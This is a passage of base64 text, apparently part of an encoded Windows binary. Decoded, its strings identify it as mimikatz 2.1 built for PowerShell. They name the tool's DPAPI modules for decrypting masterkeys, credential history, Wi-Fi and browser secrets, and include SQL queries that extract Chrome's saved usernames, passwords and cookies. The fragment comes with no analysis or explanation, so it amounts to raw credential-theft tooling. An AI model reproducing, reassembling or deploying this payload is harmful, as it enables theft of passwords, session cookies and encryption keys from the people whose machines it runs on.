NFTEVDVCBuYW1lLCByb290cGFnZSwgc3FsIEZST00gIiV3Ii4lcyBPUkRFUiBCWSByb3dpZAAAc3RhdGVtZW50IHRvbyBsb25nAAAAAAAAdW5rbm93biBvciB1bnN1cHBvcnRlZCBqb2luIHR5cGU6ICVUICVUJXMlVAAAAAAAUklHSFQgYW5kIEZVTEwgT1VURVIgSk9JTnMgYXJlIG5vdCBjdXJyZW50bHkgc3VwcG9ydGVkAABhIE5BVFVSQUwgam9pbiBtYXkgbm90IGhhdmUgYW4gT04gb3IgVVNJTkcgY2xhdXNlAAAAAAAAAGNhbm5vdCBoYXZlIGJvdGggT04gYW5kIFVTSU5HIGNsYXVzZXMgaW4gdGhlIHNhbWUgam9pbgAAAAAAAAAAAABjYW5ub3Qgam9pbiB1c2luZyBjb2x1bW4gJXMgLSBjb2x1bW4gbm90IHByZXNlbnQgaW4gYm90aCB0YWJsZXMAVU5JT04gQUxMAAAAAAAAAElOVEVSU0VDVAAAAEVYQ0VQVAAAVU5JT04AAAByb3dpZAAAAAAAAABjb2x1bW4lZAAAAAAAAAAAJS4qejoldQBhbGwgVkFMVUVTIG11c3QgaGF2ZSB0aGUgc2FtZSBudW1iZXIgb2YgdGVybXMAAABTRUxFQ1RzIHRvIHRoZSBsZWZ0IGFuZCByaWdodCBvZiAlcyBkbyBub3QgaGF2ZSB0aGUgc2FtZSBudW1iZXIgb2YgcmVzdWx0IGNvbHVtbnMAAAAAAAAAbm8gc3VjaCBpbmRleDogJXMAAAAAAAAAJyVzJyBpcyBub3QgYSBmdW5jdGlvbgAAbXVsdGlwbGUgcmVmZXJlbmNlcyB0byByZWN1cnNpdmUgdGFibGU6ICVzAAAAAAAAY2lyY3VsYXIgcmVmZXJlbmNlOiAlcwAAdGFibGUgJXMgaGFzICVkIHZhbHVlcyBmb3IgJWQgY29sdW1ucwAAAG11bHRpcGxlIHJlY3Vyc2l2ZSByZWZlcmVuY2VzOiAlcwAAAAAAAAByZWN1cnNpdmUgcmVmZXJlbmNlIGluIGEgc3VicXVlcnk6ICVzAAAAdG9vIG1hbnkgcmVmZXJlbmNlcyB0byAiJXMiOiBtYXggNjU1MzUAACoAAAAAAAAAJXMuJXMuJXMAAAAAAAAAAG5vIHN1Y2ggdGFibGU6ICVzAAAAAAAAAG5vIHRhYmxlcyBzcGVjaWZpZWQAAAAAAHRvbyBtYW55IGNvbHVtbnMgaW4gcmVzdWx0IHNldAAARElTVElOQ1QgYWdncmVnYXRlcyBtdXN0IGhhdmUgZXhhY3RseSBvbmUgYXJndW1lbnQAAAAAAABubyBzdWNoIGNvbHVtbjogJXMAAAAAAAByb3dzIHVwZGF0ZWQAAAAAQklOQVJZAAB0b28gbWFueSBhcmd1bWVudHMgb24gJXMoKSAtIG1heCAlZAAAAAAAbm8gcXVlcnkgc29sdXRpb24AAAAAAAAAYXQgbW9zdCAlZCB0YWJsZXMgaW4gYSBqb2luAAAAAAB0b28gbWFueSB0ZXJtcyBpbiBjb21wb3VuZCBTRUxFQ1QAAAAAAAAAc3ludGF4IGVycm9yIGFmdGVyIGNvbHVtbiBuYW1lICIlLipzIgAAAHBhcnNlciBzdGFjayBvdmVyZmxvdwAAAHVua25vd24gdGFibGUgb3B0aW9uOiAlLipzAAAAAAAAc2V0IGxpc3QAAAAAAAAAAG5lYXIgIiVUIjogc3ludGF4IGVycm9yAHRvbyBtYW55IGFyZ3VtZW50cyBvbiBmdW5jdGlvbiAlVAAAAAAAAAB1bnJlY29nbml6ZWQgdG9rZW46ICIlVCIAAAAAAAAAADIwMTYtMDUtMTggMTA6NTc6MzAgZmM0OWY1NTZlNDg5NzA1NjFkN2FiNmEyZjI0ZmRkN2Q5ZWI4MWZmMgAAAAAAAAAAAAAAAHVuYWJsZSB0byBjbG9zZSBkdWUgdG8gdW5maW5hbGl6ZWQgc3RhdGVtZW50cyBvciB1bmZpbmlzaGVkIGJhY2t1cHMAAAAAAG5vdCBhbiBlcnJvcgAAAABTUUwgbG9naWMgZXJyb3Igb3IgbWlzc2luZyBkYXRhYmFzZQAAAAAAYWNjZXNzIHBlcm1pc3Npb24gZGVuaWVkAAAAAAAAAABjYWxsYmFjayByZXF1ZXN0ZWQgcXVlcnkgYWJvcnQAAGRhdGFiYXNlIGlzIGxvY2tlZAAAAAAAAGRhdGFiYXNlIHRhYmxlIGlzIGxvY2tlZAAAAAAAAAAAYXR0ZW1wdCB0byB3cml0ZSBhIHJlYWRvbmx5IGRhdGFiYXNlAAAAAGludGVycnVwdGVkAAAAAABkaXNrIEkvTyBlcnJvcgAAZGF0YWJhc2UgZGlzayBpbWFnZSBpcyBtYWxmb3JtZWQAAAAAAAAAAHVua25vd24gb3BlcmF0aW9uAAAAAAAAAGRhdGFiYXNlIG9yIGRpc2sgaXMgZnVsbAAAAAAAAAAAdW5hYmxlIHRvIG9wZW4gZGF0YWJhc2UgZmlsZQAAAABsb2NraW5nIHByb3RvY29sAAAAAAAAAAB0YWJsZSBjb250YWlucyBubyBkYXRhAABjb25zdHJhaW50IGZhaWxlZAAAAAAAAABkYXRhdHlwZSBtaXNtYXRjaAAAAAAAAABsaWJyYXJ5IHJvdXRpbmUgY2FsbGVkIG91dCBvZiBzZXF1ZW5jZQAAbGFyZ2UgZmlsZSBzdXBwb3J0IGlzIGRpc2FibGVkAABhdXRob3JpemF0aW9uIGRlbmllZAAAAABhdXhpbGlhcnkgZGF0YWJhc2UgZm9ybWF0IGVycm9yAGJpbmQgb3IgY29sdW1uIGluZGV4IG91dCBvZiByYW5nZQAAAAAAAABmaWxlIGlzIGVuY3J5cHRlZCBvciBpcyBub3QgYSBkYXRhYmFzZQAAdW5rbm93biBlcnJvcgAAAGFib3J0IGR1ZSB0byBST0xMQkFDSwAAAHVuYWJsZSB0byBkZWxldGUvbW9kaWZ5IHVzZXItZnVuY3Rpb24gZHVlIHRvIGFjdGl2ZSBzdGF0ZW1lbnRzAAAAAAAAAAAAAHVuYWJsZSB0byBkZWxldGUvbW9kaWZ5IGNvbGxhdGlvbiBzZXF1ZW5jZSBkdWUgdG8gYWN0aXZlIHN0YXRlbWVudHMAZmlsZToAAAAAAAAAbG9jYWxob3N0AAAAAAAAAGludmFsaWQgdXJpIGF1dGhvcml0eTogJS4qcwB2ZnMAY2FjaGUAAABzaGFyZWQAAHByaXZhdGUAbW9kZQAAAABybwAAcncAAHJ3YwBtZW1vcnkAAGFjY2VzcwAAAAAAAG5vIHN1Y2ggJXMgbW9kZTogJXMAAAAAACVzIG1vZGUgbm90IGFsbG93ZWQ6ICVzAG5vIHN1Y2ggdmZzOiAlcwBOT0NBU0UAAFJUUklNAAAAbWFpbgAAAAB0ZW1wAAAAACVzIGF0IGxpbmUgJWQgb2YgWyUuMTBzXQAAAAAAAAAAZGF0YWJhc2UgY29ycnVwdGlvbgBtaXN1c2UAAAAAAABjYW5ub3Qgb3BlbiBmaWxlAAAAAAAAAAAAAAAAAAAAAAoAIAAgAC4AIwAjACMAIwAjAC4AIAAgACAAbQBpAG0AaQBrAGEAdAB6ACAAMgAuADEAIAAoAHgANgA0ACkAIABiAHUAaQBsAHQAIABvAG4AIABOAG8AdgAgADEAMAAgADIAMAAxADYAIAAxADUAOgAzADEAOgAxADQACgAgAC4AIwAjACAAXgAgACMAIwAuACAAIAAiAEEAIABMAGEAIABWAGkAZQAsACAAQQAgAEwAJwBBAG0AbwB1AHIAIgAKACAAIwAjACAALwAgAFwAIAAjACMAIAAgAC8AKgAgACoAIAAqAAoAIAAjACMAIABcACAALwAgACMAIwAgACAAIABCAGUAbgBqAGEAbQBpAG4AIABEAEUATABQAFkAIABgAGcAZQBuAHQAaQBsAGsAaQB3AGkAYAAgACgAIABiAGUAbgBqAGEAbQBpAG4AQABnAGUAbgB0AGkAbABrAGkAdwBpAC4AYwBvAG0AIAApAAoAIAAnACMAIwAgAHYAIAAjACMAJwAgACAAIABoAHQAdABwADoALwAvAGIAbABvAGcALgBnAGUAbgB0AGkAbABrAGkAdwBpAC4AYwBvAG0ALwBtAGkAbQBpAGsAYQB0AHoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAG8AZQAuAGUAbwApAAoAIAAgACcAIwAjACMAIwAjACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB3AGkAdABoACAAJQAyAHUAIABtAG8AZAB1AGwAZQBzACAAKgAgACoAIAAqAC8ACgAAAAoAbQBpAG0AaQBrAGEAdAB6ACgAcABvAHcAZQByAHMAaABlAGwAbAApACAAIwAgACUAcwAKAAAARQBSAFIATwBSACAAbQBpAG0AaQBrAGEAdAB6AF8AaQBuAGkAdABPAHIAQwBsAGUAYQBuACAAOwAgAEMAbwBJAG4AaQB0AGkAYQBsAGkAegBlAEUAeAA6ACAAJQAwADgAeAAKAAAAAABJAE4ASQBUAAAAAAAAAAAAQwBMAEUAQQBOAAAAAAAAAAAAAAAAAAAAPgA+AD4AIAAlAHMAIABvAG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AAdAAAAAAAYwAAAAAAAAAKAGQAYQB0AGEAIAAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAZgBsAGEAZwBzACAAIAAgACAAIAAgACAAOgAgAAAAAABwAHIAbwBtAHAAdAAgAGYAbABhAGcAcwA6ACAAAAAAAGUAbgB0AHIAbwBwAHkAIAAgACAAIAAgADoAIAAAAAAAQgBsAG8AYgA6AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AcAByAG8AdABlAGMAdAAgADsAIABDAHIAeQBwAHQAUAByAG8AdABlAGMAdABEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAABwAHIAbwB0AGUAYwB0AGUAZAAAAAAAAABzAGkAZAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbQBhAHMAdABlAHIAawBlAHkAIAA7ACAAQwBvAG4AdgBlAHIAdABTAHQAcgBpAG4AZwBTAGkAZABUAG8AUwBpAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAaABhAHMAaAAAAAAAAAAAAAoAWwBtAGEAcwB0AGUAcgBrAGUAeQBdACAAdwBpAHQAaAAgAHYAbwBsAGEAdABpAGwAZQAgAGMAYQBjAGgAZQA6ACAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBkAHAAYQBwAGkAXwBtAGEAcwB0AGUAcgBrAGUAeQAgADsAIABOAG8AIABzAHUAaQB0AGEAYgBsAGUAIABrAGUAeQAgAGYAbwB1AG4AZAAgAGkAbgAgAGMAYQBjAGgAZQAKAAAAAAAKAFsAbQBhAHMAdABlAHIAawBlAHkAXQAgAHcAaQB0AGgAIABEAFAAQQBQAEkAXwBTAFkAUwBUAEUATQAgACgAbQBhAGMAaABpAG4AZQAsACAAdABoAGUAbgAgAHUAcwBlAHIAKQA6ACAAAAAAAAAAKgAqACAATQBBAEMASABJAE4ARQAgACoAKgAKAAAAAAAqACoAIABVAFMARQBSACAAKgAqAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbQBhAHMAdABlAHIAawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAG0AYQBzAHQAZQByAGsAZQB5AF8AdwBpAHQAaABfAHMAaABhAEQAZQByAGkAdgBlAGQAawBlAHkACgAAAAAAAAAAAAAACgBbAG0AYQBzAHQAZQByAGsAZQB5AF0AIAB3AGkAdABoACAARABQAEEAUABJAF8AUwBZAFMAVABFAE0AOgAgAAAAAAAAAAAAcABhAHMAcwB3AG8AcgBkAAAAAAAAAAAAbgBvAHIAbQBhAGwAAAAAAAoAWwBtAGEAcwB0AGUAcgBrAGUAeQBdACAAdwBpAHQAaAAgAHAAYQBzAHMAdwBvAHIAZAA6ACAAJQBzACAAKAAlAHMAIAB1AHMAZQByACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbQBhAHMAdABlAHIAawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAG0AYQBzAHQAZQByAGsAZQB5AF8AdwBpAHQAaABfAHAAYQBzAHMAdwBvAHIAZAAKAAAAAAAKAFsAbQBhAHMAdABlAHIAawBlAHkAXQAgAHcAaQB0AGgAIABoAGEAcwBoADoAIAAAAAAAAAAAACAAKABuAHQAbABtACAAdAB5AHAAZQApAAoAAAAAAAAAIAAoAHMAaABhADEAIAB0AHkAcABlACkACgAAAAAAAAAgACgAPwApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBtAGEAcwB0AGUAcgBrAGUAeQBfAHcAaQB0AGgAXwB1AHMAZQByAEgAYQBzAGgACgAAAAAACgBbAGQAbwBtAGEAaQBuAGsAZQB5AF0AIAB3AGkAdABoACAAdgBvAGwAYQB0AGkAbABlACAAYwBhAGMAaABlADoAIAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBkAG8AbQBhAGkAbgBrAGUAeQBfAHcAaQB0AGgAXwBrAGUAeQAKAAAAAAAAAHAAdgBrAAAACgBbAGQAbwBtAGEAaQBuAGsAZQB5AF0AIAB3AGkAdABoACAAUgBTAEEAIABwAHIAaQB2AGEAdABlACAAawBlAHkACgAAAAAAcgBwAGMAAAAKAFsAZABvAG0AYQBpAG4AawBlAHkAXQAgAHcAaQB0AGgAIABSAFAAQwAKAAAAAABkAGMAAAAAAGQAbwBtAGEAaQBuAAAAAABbAEQAQwBdACAAJwAlAHMAJwAgAHcAaQBsAGwAIABiAGUAIAB0AGgAZQAgAGQAbwBtAGEAaQBuAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAEQAbwBtAGEAaQBuACAAbgBvAHQAIABwAHIAZQBzAGUAbgB0ACwAIABvAHIAIABkAG8AZQBzAG4AJwB0ACAAbABvAG8AawAgAGwAaQBrAGUAIABhACAARgBRAEQATgAKAAAAWwBEAEMAXQAgACcAJQBzACcAIAB3AGkAbABsACAAYgBlACAAdABoAGUAIABEAEMAIABzAGUAcgB2AGUAcgAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG0AYQBzAHQAZQByAGsAZQB5ACAAOwAgAEQAbwBtAGEAaQBuACAAQwBvAG4AdAByAG8AbABsAGUAcgAgAG4AbwB0ACAAcAByAGUAcwBlAG4AdAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbQBhAHMAdABlAHIAawBlAHkAIAA7ACAASQBuAHAAdQB0ACAAbQBhAHMAdABlAHIAawBlAHkAcwAgAGYAaQBsAGUAIABuAGUAZQBkAGUAZAAgACgALwBpAG4AOgBmAGkAbABlACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF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IASwBFAFkAUwAgAGMAYQBjAGgAZQAKAD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0ACgAAAAAAAAAAAAAACgBEAE8ATQBBAEkATgBLAEUAWQBTACAAYwBhAGMAaABlAAoAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQAKAAAAcwBhAHYAZQAAAAAAAAAAAAoAUwBBAFYARQAgAGMAYQBjAGgAZQAKAD0APQA9AD0APQA9AD0APQA9AD0ACgAAAAAAAAAAAAAAQQB1AHQAbwAgAFMASQBEACAAZgByAG8AbQAgAHAAYQB0AGgAIABzAGUAZQBtAHMAIAB0AG8AIABiAGUAOgAgACUAcwAKAAAAAAAAAAAAAABXAGkAbABsACAAZQBuAGMAbwBkAGUAOgAKACAAKgAgACUAMwB1ACAATQBhAHMAdABlAHIASwBlAHkAKABzACkACgAgACoAIAAlADMAdQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAKABzACkACgAgACoAIAAlADMAdQAgAEQAbwBtAGEAaQBuAEsAZQB5ACgAcwApAAoAAAAAAAAAAAAAAAAARQBuAGMAbwBkAGUAZAA6AAoAIAAqACAAYQBkAGQAcgA6ACAAMAB4ACUAcAAKACAAKgAgAHMAaQB6AGUAOgAgACUAdQAKAAAAVwByAGkAdABlACAAZgBpAGwAZQAgACcAJQBzACcAOgAgAAAAAAAAAE8ASwAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAG8AZQBfAFMAYQB2AGUAVABvAEYAaQBsAGUAIAA7ACAACgBrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwB3AHIAaQB0AGUARABhAHQAYQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAUgBlAGEAZAAgAGYAaQBsAGUAIAAnACUAcwAnADoAIAAAAAAAAAAAACAAKgAgACUAMwB1AC8AJQAzAHUAIABNAGEAcwB0AGUAcgBLAGUAeQAoAHMAKQAgAGkAbQBwAG8AcgB0AGUAZAAKAAAAAAAAAAAAAAAAAAAAIAAqACAAJQAzAHUALwAlADMAdQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAKABzACkAIABpAG0AcABvAHIAdABlAGQACgAAAAAAAAAAAAAAAAAgACoAIAAlADMAdQAvACUAMwB1ACAARABvAG0AYQBpAG4ASwBlAHkAKABzACkAIABpAG0AcABvAHIAdABlAGQACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AbwBlAF8ATABvAGEAZABGAHIAbwBtAEYAaQBsAGUAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AcgBlAGEAZABEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAABsb2dpbnMAAHNlbGVjdCBzaWdub25fcmVhbG0sIG9yaWdpbl91cmwsIHVzZXJuYW1lX3ZhbHVlLCBwYXNzd29yZF92YWx1ZSBmcm9tIGxvZ2lucwAAAAAACgBVAFIATAAgACAAIAAgACAAOgAgACUALgAqAFMAIAAoACAAJQAuACoAUwAgACkACgBVAHMAZQByAG4AYQBtAGUAOgAgACUALgAqAFMACgAAAAAAAAAAAFAAYQBzAHMAdwBvAHIAZAA6ACAAJQAuACoAUwAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlACAAOwAgAHMAcQBsAGkAdABlADMAXwBzAHQAZQBwADoAIAAlAFMACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlACAAOwAgAHMAcQBsAGkAdABlADMAXwBwAHIAZQBwAGEAcgBlAF8AdgAyADoAIAAlAFMACgAAAGNvb2tpZXMAc2VsZWN0IGhvc3Rfa2V5LCBwYXRoLCBuYW1lLCBjcmVhdGlvbl91dGMsIGV4cGlyZXNfdXRjLCBlbmNyeXB0ZWRfdmFsdWUgZnJvbSBjb29raWVzIG9yZGVyIGJ5IGhvc3Rfa2V5LCBwYXRoLCBuYW1lAAAAAAAAAAAAAAAAAAAKAEgAbwBzAHQAIAAgADoAIAAlAC4AKgBTACAAKAAgACUALgAqAFMAIAApAAoATgBhAG0AZQAgACAAOgAgACUALgAqAFMACgBEAGEAdABlAHMAIAA6ACAAAAAAAAAAAAAgAC0APgAgAAAAAAAAAAAAQwBvAG8AawBpAGUAOgAgACUALgAqAFMACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGQAcABhAHAAaQBfAGMAaAByAG8AbQBlACAAOwAgAE4AZQBpAHQAaABlAHIAIAB0AGgAZQAgAHQAYQBiAGwAZQAgACcAbABvAGcAaQBuAHMAJwAgAG8AcgAgAHQAaABlACAAdABhAGIAbABlACAAJwBjAG8AbwBrAGkAZQBzACcAIABlAHgAaQBzAHQAIQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZABwAGEAcABpAF8AYwBoA